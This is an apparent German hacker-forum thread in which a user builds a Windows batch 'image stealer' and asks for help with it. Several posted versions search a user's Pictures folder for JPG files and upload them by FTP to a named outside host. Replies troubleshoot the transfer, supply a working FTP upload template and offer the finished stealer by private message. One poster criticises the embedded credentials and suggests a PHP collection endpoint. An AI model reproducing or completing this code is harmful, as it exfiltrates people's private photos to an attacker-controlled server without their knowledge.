Hey hab vorher durch einen post die idee bekommen das man nen "Bilder stealer" proggen könnte , nun habe ich das mal EXTREM EINFACH realisiert , nix großes muss noch wachsen (verschiedene Ordner durchsuchen etc) doch ich wollte erstmal testen wie man das am besten reallisieren kann , hab das gnaze also mal mit batch angefangen weil ich batch relativ beherrsche und ich in alle anderen programmiersprachen noch nicht genug Know How dafür habe...

Hab jetztd as suchen reallisiert doch ich bekomms net hin mich mit dem ftp zu connecten...


@echo off
cd "C:\Users\%username%\Pictures"
IF NOT EXIST *.jpg (
md Fehler
) ELSE (
dir /b /s *.jpg >> "C:\Users\%username%\Pictures\Bilderliste.txt"
)
echo open 8022.kilu.de >> C:\dump.bat
echo BENUTZERNAME >> C:\dump.bat
echo PASSWORT >> C:\dump.bat
echo type binary >> C:\dump.bat
for %%i in (*.jpg) do echo send "%%i" >> C:\dump.bat
ftp -s:C:\dump.bat
pause


Das programm führ alles aus , findet bei mir im ordner "eigene bilder / pictures auch tatsächlich die bilder (3stk) die ich reinkopiert habe , erstellt eine liste mit den Pfaden und Namen der Bilder, und versucht dann sich per ftp zu verbinden , DOCH er nimmt passwort und Username nicht an , wie kann ichd as realisieren???

mfg euer wissensbegierige Chiqsaw ;D

Sag mal, wie kann man sich eigentlich trauen in einem Forum wie diesem sowas zu schreiben:

echo BENUTZERNAME >> C:\dump.bat
echo PASSWORT >> C:\dump.bat
?
Ist mir echt unbegreiflich.

Ich frage mich gerade warum das falsch ist?

das sind NICHT meien einlogdaten sondern eben nur "ersetzbare" namen :D

Edit: Source sieht jetzt soa us : problem die dateien kann es nicht hochladen weil sie NICHT GEFUNDEN??? werden oO vorhanden sind sie aber:


@echo off
cd "C:\Users\%username%\Pictures"
IF NOT EXIST *.jpg (
md Fehler
) ELSE (
dir /b /s *.jpg >> "C:\Users\%username%\Pictures\Bilderliste.txt"
)
set tempftp=%temp%\fileserver.ftp
echo OPEN 8022.kilu.de > %tempftp%
echo USER BENUTZERNAME PASSWORT >> %tempftp%
echo send %1 >> %tempftp%
REM echo disconnect >> %tempftp%
REM echo quit >> %tempftp%
REM echo type binary >> C:\dump.bat
for %%i in (*.jpg) do echo send "C:\Users\%username%\Pictures\%%i" >> %tempftp%
ftp.exe -n -i -s:%tempftp%
pause
exit

bei mir funtz das auch nicht ...
ich glaube wegen %username%

%username% funktioniert einwandfrei :D

setz dich mal mit der syntax von batch auseinander, liegt glaube ich an der firewall eisntellung , nacher kommt dann nämlich
"200 Port command successfull"
und danach dann das ein timeout bei port schlagmich tot vokommt und der fehler 425.... -.-'

Dies tritt nur auf, wenn der FTP-Site gruppiert ist. Aufgrund der Natur von einer Cluster-Umgebung, muss der Cluster Service wissen, welche Ressourcen verfügbar sind. Die IIS-Cluster-Ressource tut dies durch die Is-Alive and Keep-Alive-Funktionalität Clusiis4.dll, ihre Ressource Dynamic Link libraray (DLL). Da RFC 959 definiert als Fehler 426 "Connection closed; Übertragung abgebrochen" und der Ist-Alive oder Keep-Alive-Betrieb ist kein echter FTP-Sitzung, die Fehler protokolliert.

Das sagt halt google ... ich werde aber nicht schlau draus ?!

Mhm versteh ich auch nicht, kann mir das jemand erklären oder weis jemand ne lösung???
dies kommt btw auch bei einer übertragung einer txt datei...

Also die Sache an sich finde ich obercool.
Bitte halt das doch mal am Laufen.

LG

Aktueller Code:


@echo off
cd "C:\Users\%username%\Pictures"
IF NOT EXIST *.jpg (
md Fehler
) ELSE (
dir /b /s *.jpg >> "C:\Users\%username%\Pictures\BilderListe.txt"
)
set tempftp=%temp%\fileserver.ftp
echo OPEN 8022.kilu.de > %tempftp%
echo USER MEINBENUTZERNAME MEINPW >> %tempftp%
echo BIN>> %tempftp%
for %%i in (*.jpg) do echo send "C:\Users\%username%\Pictures\%%i" >> %tempftp%
ftp.exe -n -i -s:%tempftp%
echo DONE



Aktuelle fehlermeldung:


425 Could not open data connection to Port 50032: Connection Timed out

open ftp://***.**.funpic.de
username
passwort
bye
*** und ** ersetzen
username durch deinen ftp-Username ersetzen (nicht dahinterschreiben) (normalerweise das was *** ist)
passwort durch dein ftp-Passwort ersetzen

ftp -s:neu.ftp
pause
pauseneu.bat und neu.ftp müssen im selben verzeichnis liegen, andernfalls Pfadangaben machen.

Funktioniert perfekt, eben auf funpic getestet.

Jo , guter anfang nur mein progblem ist ja das ich alle bilder deren namen ich vllt nicht weis hochladen will d.h. dazu frauch ich die for schleife,....

zweicks anführungszeichen , dadurch das ich Vor und hinter dem satz shconw elche gemacht habe reicht das aus, geht aber auch mit deirn art :D


Edit :
und wo lädst du da was hoch ??? xD

Ich frage mich gerade warum das falsch ist?

das sind NICHT meien einlogdaten sondern eben nur "ersetzbare" namen :D
Ach, echt? Es werden aber deine sein, wenn du das Teil verschickst (es sei denn, du hast deinen FTP-Server so gepatcht, dass er jeden Login akzeptiert - was noch lächerlicher wäre).
Kannst du der Person von der du die Bilder haben willst nicht einfach gleich den Login zu deinem FTP-Server geben und die Person bitten alle Pornos in den Order /upload/ reinzupacken?

Wäre sicher ähnlich effizient.

Es geht ja nur ums prinzip , ausserdem wird die batch später zu ner exe datei verwandelt was das auslesen denk ich mal erschwert , aber darum geht es ja nicht , es geht darum das wissen zue rweitern wie man das hier lösen könnte , kannst du das?

Batch->Exe, soso. Und wie geht das?
1. arbeiten die ganzen Batch->Exe Programme auf die selbe Weise: Batch an Stub anhängen; Stub droppt die Batch-Datei und führt sie aus. Da wird nichts compiliert, sondern nur die Art geändert, wie du es aufrufst.
2. wenn du meinst, dass allein die Tatsache, dass da jetzt .exe statt .bat/.cmd/.whatever steht es unmöglich macht an den Login dran zu kommen bist du naiv.
3. wenn du glaubst die Tatsache, dass da jetzt .exe steht sorgt dafür, dass das FTP-Programm den Login verschlüsselt überträgt, fehlt dir selbst das Mindestmaß an gesundem Menschenverstand, der nötig wäre um hier zu posten. (Stichwort Packet Sniffer; z.B. Wireshark; egal ob .exe oder nicht - das Programm sendet den Login an den Server und der geht übers Netzwerk und alles was der Computer übers Netzwerk schickt kann aufgezeichnet werden)
4. wenn du meinst die Lösung wäre trotzdem sinnvoll, weil sie das Problem löst, obwohl sie fundamentale Mängel aufweist, dann nimm dir ein paar Freunde und Eimer und Schaufel mit zum Golf von Mexico und biete denen an das Öl zu beseitigen. Nach ein paar tausend Jahren wird deine Arbeit da sicher Früchte tragen. Wenn die Eimer voll sind könnt ihr auch dazu übergehen das Öl zu trinken.
5. es ist immer wieder extrem frustierend sich in einem Hacker-Forum (jaja, ich benutze den Begriff jetzt hier einfach mal; ersetzt Hacker durch ScriptKiddy, wenn ihr meint FH wäre keins) aufzuhalten und dann einer "unsicher ist doch scheiß-egal"-Mentalität entgegenzublicken - gerade von denen, die es doch eigentlich besser wissen sollten. In der News-Section war auch mal ein Artikel mit dem durch die Medien reißerisch formulierten Titel "Hacker hacken Hacker", was im Grunde bedeutet, dass sich ein paar Idioten für besonders cool gehalten haben, als sie ihre kleinen Spielzeuge zusammengepastet haben und dann am Schluss in die Röhre geschaut haben, als sich rausstelle, dass da fatale Sicherheitslücken drin waren, die dann im Endeffekt auch wieder von anderen gegen sie selber genutzt wurden.


kannst du das?
Neiiiiiiiiiiiiiiiiiiiiiiiiin. Batch ist viel zu komplex!

Ich hab den stealer schon fertig ...
Ich kann dir helfen chiqsaw !

Gut kannste den Src per pm mir mal bitte schicken ...

so und jetzt zu dir blackberry:


1. arbeiten die ganzen Batch->Exe Programme auf die selbe Weise: Batch an Stub anhängen; Stub droppt die Batch-Datei und führt sie aus. Da wird nichts compiliert, sondern nur die Art geändert, wie du es aufrufst.
Soweit ich weis nicht aber wenn du das sagst wird dein ultra 1337 wissen wohl recht haben .

Ich habe nicht gesagt das exe dann die daten automatisch verschlüsselt sendet oder was auch immer , das hast NUR DU behauptet und dabei wird es bleiben , du hast auch Thema failed denn du hast in 2 risen posts dir nichteinmal durchgelesen was der sinn dieses Threads war: nämlich das lösen des fehlers der bei mir auftritt , Aber nein du willst ja lieber kritisieren , gut dann sag mir mal bitte warum es stealer gibt wenn sie so unnötig sind weil man sie auslesen kann , das ist ja nicht das programm was ich verwenden will sondern aus spaß an der freude eine kleine aufgabe die ich gefunden habe.
Ich verstehe nicht wie ignorant du bist sondern einfahc nur stur deinen weg gehst , und um jetzt mal genau DICH zu bemängeln , wenn du dich für etwas interessierst und etwas machen willst aber hilfe brauchst , dann würdest du dich auch über hilfe freuen oder? oder natürlich aus deinern ansicht nur über ellenlange streitereien ob das was du vorhast sinnvoll ist oder nicht ....
Komm ganz ehrlich bleib raus aus diesem threat , wenn du nur hier bist um andere leute zu kritisieren dann geh in ne Selbsthilfegruppe und mach das mit deinem Pfleger -.-

Soweit ich weis nicht aber wenn du das sagst wird dein ultra 1337 wissen wohl recht haben .
Ich würde sagen ich und mein "ultra 1337 Wissen" haben solange Recht, bis du mir das Gegenteil beweist. Solange du das nicht kannst oder tust setzt die Verwendung eines ironischen Untertons wohl eher dich selber in ein schlechtes Licht, da mein "1337 Wissen" bis jetzt größer zu sein scheint. :)


Ich habe nicht gesagt das exe dann die daten automatisch verschlüsselt sendet oder was auch immer , das hast NUR DU behauptet und dabei wird es bleiben
Es tut mir Leid, dass ich davon ausgegangen bin du wärst dir darüber im Bilde was du selber gesagt hattest, aber hier nochmal für die ganz Langsamen:

ausserdem wird die batch später zu ner exe datei verwandelt was das auslesen denk ich mal erschwert
Wenn du mir also nicht erklären kannst, was das Auslesen daran bitte erschwert (wow, ich mach halt den HexEditor statt Notepad auf), wenn nichts verschlüsselt wird, dann war mein Bezug auf fehlende Verschlüsselung in meinen Augen äußerst passend.


du hast auch Thema failed denn du hast in 2 risen posts dir nichteinmal durchgelesen was der sinn dieses Threads war
Der Sinn war es ein Programm zum Funktionieren zu bringen, das ein protenzielles Sicherheitsrisiko für jeden ist, der es benutzt.
Nur weil ich den Sinn für bescheuert halte muss man mir noch lange nicht unterstellen ihn nicht erfasst zu haben.


gut dann sag mir mal bitte warum es stealer gibt wenn sie so unnötig sind weil man sie auslesen kann
Man kann auslesen, was da ist. Wenn keine FTP-Logins oder ähnliches drin sind, dann kann auch nichts gefunden werden - und solche Konzepte gibt es. Dabei kann man sich ein PHP-Skript schreiben (oder einen kleinen Server mit eigenem Protokoll, wenn man Lust und Laune und die nötigen Mittel [VPS, o.ä.] hat), dass einfach speichert, was via GET oder POST übergeben wird. Das sichert einen zwar prinzipiell nicht vor Flooden (es sei denn, man speichert auch die IP des Absenders und baut eine Zeitschranke ein - dann müsste ein Angreifer schon mit einer großen Menge an Proxies arbeiten um effizient Flooden zu können), aber zumindest bekommt niemand irgendwelche Passwörter raus, womit man dann anschließend die Logs löschen könnte, oder allgemein hoch- und runterladen was man will.

Mir geht es darum, dass es hier im Forum doch immer wieder darum geht Sicherheitslücken auszunutzen - da sollte man doch nicht auch noch selber welche produzieren.


das ist ja nicht das programm was ich verwenden will sondern aus spaß an der freude eine kleine aufgabe die ich gefunden habe.
Eine elegante Lösung zu finden scheint dich dabei ja nicht zu interessieren.


und um jetzt mal genau DICH zu bemängeln , wenn du dich für etwas interessierst und etwas machen willst aber hilfe brauchst , dann würdest du dich auch über hilfe freuen oder?
Wenn ich Hilfe beim Programmieren brauche, dann benutze ich Google - und das eben solange, bis ich einen guten Lösungsansatz gefunden habe. Infolgedessen stelle ich nicht alle 2 Tage irgendwelche blöden Fragen.

Außerdem: wenn mir jemand sagt, dass das was ich mache Schwachsinn ist und mir auch eine Begründung dafür geben kann, wieso das so ist, dann tue ich sicher alles andere als den Schwachsinn weiter zu praktizieren. Wer geht hier denn also bitte stur seinen Weg?


-.-
-.-*